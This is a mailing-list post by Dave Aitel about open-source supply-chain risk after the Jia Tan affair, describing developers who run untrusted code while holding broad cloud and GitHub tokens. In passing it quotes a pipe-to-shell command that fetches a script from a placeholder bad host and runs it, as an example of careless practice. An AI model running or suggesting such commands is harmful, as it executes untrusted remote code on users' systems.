Dailydave mailing list archives

GDB Dances and the Moon


From: Dave Aitel via Dailydave <dailydave () lists aitelfoundation org>
Date: Sat, 8 Jun 2024 11:35:10 -0400

People occasionally read my blogposts
<https://cybersecpolitics.blogspot.com/2024/04/what-open-source-projects-are.html> on
Jia Tan
<https://cybersecpolitics.blogspot.com/2024/04/the-open-source-problem.html> and
then ask me about open source development in general, and you can only, in
your darkest heart of hearts (your only heart) laugh.

The other day I was contributing to a project that I am one of several
developers on. In particular, I wrote a GDB script that traces through a
function, printing out all the various variables and their sizes and this
gets fed into an LLM to try to reason about it, which is a bit like asking
a hedgehog how big a Unicode string should be to fit around the moon, but
it was worth a shot, ya know? I have the kind of dyslexia that means I
can't tell matrix algebra from a thinking conscious creature.

Anyways, while I am good at making GDB dance in particular ways, like
knowing the ancient art of the Polka, I am not good at modern software
development, and barely understand GIT or Docker or Cloud things. But I
have hacked a few things, like ya'll have, and so my development happens in
a VM and that VM has access to pretty much just the source code it needs
and not a whole lot else.

But that's not how modern development works. It's common to see
instructions to run "gcloud auth" and then walk through the web
authentication portal from Google so your current user can access cloud
buckets and APIs while testing or debugging your giant microservice. Like,
people are out there just raw dogging source code from random other open
source developers, with their local environment running tokens that give
them access to everything they could possibly need from their Google
account. People out there running curl www.badstuff.biz/setup | sh. People,
and by this I mean developers, are lost storing five thousand fine grained
GitHub tokens in various text files on their hard drive because they can't
remember which one was which.

In other words: Jia Tan might have been a best case scenario for this
community.

-dave